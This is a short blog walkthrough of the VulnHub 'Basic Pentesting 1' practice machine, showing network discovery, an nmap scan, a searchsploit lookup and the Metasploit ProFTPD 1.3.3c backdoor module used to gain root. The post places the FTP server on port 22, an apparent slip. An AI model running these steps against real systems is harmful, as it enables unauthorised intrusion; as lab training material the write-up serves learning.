Basic Pentesting 1 - VulnHub CTF Challenge Walkthrough

in ctfhacksolutions •  6 years ago 


Basic Pentesting 1 is available at VulnHub. Its difficulty level is "Easy". This machine has no flags and sadly lacks CTF flavor. It contains multiple Remote and Privilege Escalation Vulnerabilities. There's a lot for beginners to learn from it. The goal is to get root.

Throughout this walkthrough, I'll be using Parrot Sec OS but you can use Kali or any other distro.

Import and turn on the machine. Use netdiscover to determine the IP of the machine

sudo netdiscover -i wlan0 -r 192.168.8.1/24

 

Now run a full port Nmap scan.

nmap -A -p- 192.168.8.163

 

The FTP Server (ProFTPD 1.3.3c) running on port 22 seems vulnerable. Use SearchSploit to search for exploits related to that software.

searchsploit Proftpd 1.3.3c

 

We've found a Metasploit module for that vulnerability. Now, fire up Metasploit,

sudo postgresql start
sudo msfconsole
msf> search Proftpd 1.3.3c

 

We've found a Metasploit module "exploit/unix/ftp/proftpd_133c_backdoor".

use exploit/unix/ftp/proftpd_133c_backdoor
set RHOST 192.168.8.163

 

Now, run the module.


And here, we successfully got ROOT access. There must be other vulnerabilities on HTTP, give them a try!.

 


Posted from my blog with SteemPress : https://latesthackingnews.com/2018/08/20/basic-pentesting-1-vulnhub-ctf-challenge-walkthrough/

Authors get paid when people like you upvote their post.
If you enjoyed what you read here, create your account today and start earning FREE STEEM!